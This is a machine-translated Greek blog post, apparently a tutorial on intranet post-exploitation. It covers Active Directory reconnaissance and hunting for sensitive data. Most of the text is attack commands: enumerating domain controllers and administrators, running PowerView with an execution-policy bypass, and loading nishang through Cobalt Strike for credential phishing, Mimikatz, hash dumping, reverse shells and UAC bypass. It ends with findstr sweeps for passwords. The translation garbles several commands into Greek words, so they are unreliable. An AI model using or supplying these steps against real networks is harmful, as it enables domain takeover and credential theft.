Κοινή χρήση τεχνολογίας

Ασφάλεια intranet: ανίχνευση πληροφοριών εντός τομέα

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

1. Συλλογή βασικών πληροφοριών εντός του τομέα

2.NET εντολές αναλυτική εξήγηση

3. Μέθοδοι συλλογής τομέα που χρησιμοποιούνται κυρίως σε intranets

4. Πώς να βρείτε ελεγκτές τομέα

5. Ερωτήστε τις βασικές πληροφορίες των χρηστών στον τομέα

6. Διαχείριση τομέα τοποθέτησης

7.Εντολές Powershell και εντοπισμός ευαίσθητων πληροφοριών







1. Συλλογή βασικών πληροφοριών εντός του τομέα:

Τέσσερις καταστάσεις:

1. Τοπικός χρήστης: χρήστης

2. Χρήστης τοπικού διαχειριστή: απενεργοποιημένο στην αρχική έκδοση, διαθέσιμο μόνο στον διακομιστή

3. Χρήστες εντός του τομέα

4. Διαχειριστής τομέα

Οι απλοί τοπικοί χρήστες δεν μπορούν να λάβουν πληροφορίες τομέα

Οι χρήστες τοπικού διαχειριστή μπορούν να κλιμακώσουν απευθείας τα δικαιώματά τους στους χρήστες του συστήματος (χρήστες εντός του τομέα) και να λάβουν πληροφορίες εντός του τομέα.

1. Προσδιορίστε εάν ο τομέας υπάρχει:

1. Ελέγξτε τον τομέα: ipconfig/all ή systeminfo ή σταθμός εργασίας net config

ipconfig /all: Βρέθηκε τομέας: hack.com

systeminfo: Ο τομέας που βρέθηκε είναι: hack.com

2. Προβάλετε τον κεντρικό υπολογιστή DNS του τομέα: όνομα τομέα nslookup (hack.com)

3.Καθαρός χρόνος /τομέας τρεις καταστάσεις

Ο τομέας υπάρχει, αλλά ο τρέχων χρήστης δεν είναι χρήστης τομέα

Υπάρχει ένας τομέας και ο τρέχων χρήστης είναι χρήστης τομέα

Το τρέχον περιβάλλον δικτύου είναι μια ομάδα εργασίας και δεν υπάρχει τομέας

Λεπτομέρειες εντολής 2.NET:

Προβολή 1.net: Εμφάνιση λίστας τομέα, λίστα υπολογιστών, καθορισμένοι κοινόχρηστοι πόροι υπολογιστή: net view (εμφάνιση λίστας υπολογιστή) net view \computer (προβολή καθορισμένου κοινόχρηστου υπολογιστή)

net view /domain:domain name (hack) (εμφάνιση λίστας υπολογιστών)

2.net χρήστης για προβολή τοπικών χρηστών: net user /domain για να δείτε πόσοι χρήστες βρίσκονται στον τομέα

Προσθήκη χρήστη: καθαρό όνομα χρήστη (διαχειριστής) κωδικός πρόσβασης (123)/προσθήκη

Χρήση 3.net: Συνδέστε τον υπολογιστή ή αποσυνδέστε τον υπολογιστή από τον κοινόχρηστο πόρο, εμφανίστε τις πληροφορίες σύνδεσης του υπολογιστή

4.net time: Χρησιμοποιήστε το χρόνο για να συγχρονίσετε υπολογιστές ή τομείς: καθαρός χρόνος \computer net time /domain

5.net start: Εκκίνηση της υπηρεσίας ή εμφάνιση της υπηρεσίας που ξεκίνησε: υπηρεσία καθαρής εκκίνησης

6.net pause: Παύση της υπηρεσίας που εκτελείται: υπηρεσία καθαρής παύσης

7.net συνέχεια: Ενεργοποιήστε ξανά την υπηρεσία: υπηρεσία net συνέχεια

8.net stop: Διακοπή υπηρεσίας Windows NT/2000/2003: υπηρεσία διακοπής δικτύου

9.net share: διαγραφή, δημιουργία ή εμφάνιση κοινόχρηστων πόρων

Συνεδρία 10.net: Καταχωρίστε ή αποσυνδέστε τις περιόδους λειτουργίας του τοπικού υπολογιστή και τους πελάτες που είναι συνδεδεμένοι σε αυτόν:

net session //υπολογιστής (προσδιορίζει τον υπολογιστή που θα καταχωριστεί στη λίστα ή θα πραγματοποιηθεί περίοδος λειτουργίας)

net session //διαγραφή υπολογιστή (αποσυνδέστε την περίοδο λειτουργίας του καθορισμένου υπολογιστή)

11.net localgroup Προβολή ομάδας υπολογιστών (ισχύει μόνο για τοπικό): όνομα χρήστη net τοπικής ομάδας

Χρήστης τομέα: όνομα χρήστη/τομέας καθαρής τοπικής ομάδας

Η ομάδα 12.net ερωτά το όνομα της ομάδας στον τομέα (ισχύει μόνο για ελεγκτές τομέα): net group /domain

Το 13.net config εμφανίζει τις τρέχουσες εκτελούμενες υπηρεσίες με δυνατότητα διαμόρφωσης ή εμφανίζει και αλλάζει τη διαμόρφωση μιας υπηρεσίας (τοπικά):

net config (εμφανίζει τις υπηρεσίες που εκτελούνται) υπηρεσίες net config (εμφανίζει μια λίστα υπηρεσιών)

Υπολογιστής 14.net Προσθήκη ή διαγραφή υπολογιστών από τη βάση δεδομένων τομέα:

net computer \computername /add ή /del (προσθήκη ή διαγραφή υπολογιστών στον τομέα σύνδεσης)

3. Μέθοδοι συλλογής τομέα που χρησιμοποιούνται κυρίως σε intranets

Εάν εμφανιστεί η ένδειξη "Η λίστα διακομιστών αυτής της ομάδας εργασίας δεν είναι διαθέσιμη αυτήν τη στιγμή", ενεργοποιήστε τις υπηρεσίες: Διακομιστής, σταθμός εργασίας, πρόγραμμα περιήγησης υπολογιστή και κλείστε το τείχος προστασίας.

Προβολή τομέα: ipconfig/all ή systeminfo ή σταθμός εργασίας net config

Προβολή του κεντρικού υπολογιστή DNS του τομέα: nslookup όνομα τομέα (hack.com)

Τομέας ερωτήματος: καθαρή προβολή /τομέας

Ερώτημα σε όλους τους υπολογιστές στον τομέα: net view /domain:domain name

Υποβάλετε ερώτημα στη λίστα όλων των ομάδων χρηστών στον τομέα: ομάδα δικτύου /τομέας

Υποβάλετε ερώτημα στη λίστα υπολογιστών όλων των μελών τομέα: net group "domain computers" /domain

Ζητήστε τις πληροφορίες κωδικού πρόσβασης στον τομέα: net accounts /domain

Λάβετε πληροφορίες εμπιστοσύνης τομέα: nltest /domain_trusts

4. Πώς να βρείτε ελεγκτές τομέα

Προβολή ονόματος ελεγκτή τομέα: nltest /DCLIST:hack

Δείτε το όνομα του μηχανήματος, βρείτε το IP, ping/nslookup: όνομα ελεγκτή τομέα ping/nslookup

Μερικές φορές το ping είναι απενεργοποιημένο. Χρησιμοποιήστε το nslookup εδώ.

Προβολή ονόματος κεντρικού υπολογιστή ελεγκτή τομέα: nslookup ‐type=SRV _ldap._tcp

Ελέγξτε την τρέχουσα ώρα: καθαρή ώρα /τομέας

Προβολή της ομάδας ελεγκτών τομέα: ομάδα δικτύου "Ελεγκτές τομέα" /τομέας

5. Ερωτήστε τις βασικές πληροφορίες των χρηστών στον τομέα

1. Ζητήστε πληροφορίες χρήστη στον τομέα: net user /domain

2. Προβολή τοπικών χρηστών: wmic useraccount λήψη ονόματος Χρήστες τομέα: wmic useraccount λήψη domain,όνομα

Τοπικός χρήστης:

Χρήστης τομέα:

3. Ελέγξτε τους υπάρχοντες χρήστες: dsquery user (μερικές φορές μπορεί να μην εκτελεστεί και μπορεί να εκτελεστεί μόνο στο μηχάνημα διακομιστή)

4. Ρωτήστε την ομάδα χρηστών τοπικού διαχειριστή: net localgroup administrators

5. Ερώτημα για χρήστες διαχειριστή τομέα: ομάδα δικτύου "διαχειριστές τομέα" /τομέας

6. Υποβάλετε ερώτημα στην ομάδα χρηστών διαχειριστή τομέα: ομάδα δικτύου "Διαχειριστές επιχειρήσεων" /τομέας

6. Διαχείριση τομέα τοποθέτησης

Εδώ χρειάζονται δύο εργαλεία

Πρώτα ανεβάστε το εργαλείο στον διακομιστή και μετά εκτελέστε το

1.PVEFindADUser: PVEFindADUser.exe -current (σημειώστε τη διαδρομή) Αυτό το εργαλείο μπορεί να ελέγξει ποιοι χρήστες έχουν συνδεθεί στον υπολογιστή, επιτρέποντάς μας να βρούμε τον διαχειριστή τομέα

2.powerView σενάριο:

powershell.exe ‐exec bypass ‐command "& { import‐module .PowerView.ps1;Invoke‐UserHunter}"

7.Εντολές Powershell και εντοπισμός ευαίσθητων πληροφοριών

Ελέγξτε πρώτα τα δικαιώματα: Get-ExecutionPolicy

Αλλάξτε την πολιτική εκτέλεσης: Set-ExecutionPolicy Unrestricted (μόνο τα απεριόριστα δικαιώματα μπορούν να εκτελέσουν pow)

εργαλείο nishang (υπάρχει σύνδεσμος λήψης στο προηγούμενο άρθρο):

Αφού το τοποθετήσετε στον κατάλογο CS, εισάγετέ το απευθείας: powershell-import nishang/nishang.psm1

Εκτέλεση: εντολή powershell

Μερικές εντολές που χρησιμοποιούνται συνήθως:

Check-VM: Ελέγξτε αν ο κεντρικός υπολογιστής είναι εικονική μηχανή

Invoke-CredentialsPhish: Ξεγελάστε τον χρήστη ώστε να εισάγει τον κωδικό πρόσβασής του

Get-WLAN-Keys: πληροφορίες wifi

Invoke-Mimikatz: Λήψη κωδικών πρόσβασης

Get-PassHashes: Λάβετε hash

Get-PassHints: Λάβετε τις πληροφορίες υπόδειξης κωδικού πρόσβασης του χρήστη

Invoke-PowerShellTcp: Rebound shell

Invoke-PsUACme: Παράκαμψη UAC

Remove-Update: Αφαιρέστε την ενημερωμένη έκδοση κώδικα

Λήψη πληροφοριών: τοπικές πληροφορίες

Παράδειγμα: powershell Check-VM

Εντοπισμός ευαίσθητων δεδομένων:

1. Συλλέξτε διάφορα ευαίσθητα αρχεία σε καθορισμένους καταλόγους

dir /a /s /bd:"*.txt"

dir /a /s /b C:"*.xlsx"

dir /a /s /bd:"*.md"

dir /a /s /bd:"*.sql"

dir /a /s /bd:"*.pdf"

dir /a /s /bd:"*.docx"

dir /a /s /bd:"*.doc"

dir /a /s /bd:"*conf*"

dir /a /s /bd:"*bak*"

dir /a /s /bd:"*pwd*"

dir /a /s /bd:"*pass*"

dir /a /s /bd:"*login*"

dir /a /s /bd:"*χρήστης*"

2. Συλλέξτε διάφορους κωδικούς πρόσβασης λογαριασμού από αρχεία στον καθορισμένο κατάλογο

findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si χρήστη *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

Παράδειγμα: dir /a /s /bd:"*.txt"